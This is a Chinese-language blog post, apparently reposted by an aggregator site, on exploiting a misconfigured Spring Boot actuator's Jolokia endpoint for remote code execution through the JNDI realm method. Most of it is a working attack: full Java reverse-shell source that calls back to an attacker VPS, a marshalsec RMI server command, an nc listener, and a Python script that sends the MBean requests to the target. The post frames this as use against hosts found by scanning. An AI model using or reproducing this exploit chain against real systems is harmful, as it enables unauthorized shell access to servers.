日穿掃描掃到一個(gè)spring boot actuator

可以看到有jolokia這個(gè)端點(diǎn)，再看下jolokia/list，存在type=MBeanFactory 關(guān)鍵字?

可以使用jolokia-realm-jndi-rce具體步驟如下
先用python3開一個(gè)web服務(wù)?

python3 -m http.server 8080

編譯java利用代碼

/*** javac -source 1.5 -target 1.5 JNDIObject.java** Build By LandGrey* */import java.io.File; import java.io.InputStream; import java.io.OutputStream; import java.net.Socket;public class JNDIObject {static {try{String ip = "your-vps-ip";String port = "443";String py_path = null;String[] cmd;if (!System.getProperty("os.name").toLowerCase().contains("windows")) {String[] py_envs = new String[]{"/bin/python", "/bin/python3", "/usr/bin/python", "/usr/bin/python3", "/usr/local/bin/python", "/usr/local/bin/python3"};for(int i = 0; i < py_envs.length; ++i) {String py = py_envs[i];if ((new File(py)).exists()) {py_path = py;break;}}if (py_path != null) {if ((new File("/bin/bash")).exists()) {cmd = new String[]{py_path, "-c", "import pty;pty.spawn(\"/bin/bash\")"};} else {cmd = new String[]{py_path, "-c", "import pty;pty.spawn(\"/bin/sh\")"};}} else {if ((new File("/bin/bash")).exists()) {cmd = new String[]{"/bin/bash"};} else {cmd = new String[]{"/bin/sh"};}}} else {cmd = new String[]{"cmd.exe"};}Process p = (new ProcessBuilder(cmd)).redirectErrorStream(true).start();Socket s = new Socket(ip, Integer.parseInt(port));InputStream pi = p.getInputStream();InputStream pe = p.getErrorStream();InputStream si = s.getInputStream();OutputStream po = p.getOutputStream();OutputStream so = s.getOutputStream();while(!s.isClosed()) {while(pi.available() > 0) {so.write(pi.read());}while(pe.available() > 0) {so.write(pe.read());}while(si.available() > 0) {po.write(si.read());}so.flush();po.flush();Thread.sleep(50L);try {p.exitValue();break;} catch (Exception e) {}}p.destroy();s.close();}catch (Throwable e){e.printStackTrace();}} } javac -source 1.5 -target 1.5 JNDIObject.java

架設(shè)惡意 rmi 服務(wù)?

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://vps:8080/#JNDIObject 1389

監(jiān)聽端口

nc -lvp 443

執(zhí)行exp

#!/usr/bin/env python3 # coding: utf-8 # Referer: https://ricterz.me/posts/2019-03-06-yet-another-way-to-exploit-spring-boot-actuators-via-jolokia.txtimport requestsurl = 'http://127.0.0.1:8080/jolokia'create_realm = {"mbean": "Tomcat:type=MBeanFactory","type": "EXEC","operation": "createJNDIRealm","arguments": ["Tomcat:type=Engine"] }wirte_factory = {"mbean": "Tomcat:realmPath=/realm0,type=Realm","type": "WRITE","attribute": "contextFactory","value": "com.sun.jndi.rmi.registry.RegistryContextFactory" }write_url = {"mbean": "Tomcat:realmPath=/realm0,type=Realm","type": "WRITE","attribute": "connectionURL","value": "rmi://your-vps-ip:1389/JNDIObject" }stop = {"mbean": "Tomcat:realmPath=/realm0,type=Realm","type": "EXEC","operation": "stop","arguments": [] }start = {"mbean": "Tomcat:realmPath=/realm0,type=Realm","type": "EXEC","operation": "start","arguments": [] }flow = [create_realm, wirte_factory, write_url, stop, start]for i in flow:print('%s MBean %s: %s ...' % (i['type'].title(), i['mbean'], i.get('operation', i.get('attribute'))))r = requests.post(url, json=i)r.json()print(r.status_code) python3 springboot-realm-jndi-rce.py

然后等兩秒shell就回來了?

新人創(chuàng)作打卡挑戰(zhàn)賽發(fā)博客就能抽獎(jiǎng)！定制產(chǎn)品紅包拿不停！

總結(jié)

以上是生活随笔為你收集整理的Springboot之actuator配置不当漏洞RCE（jolokia）的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。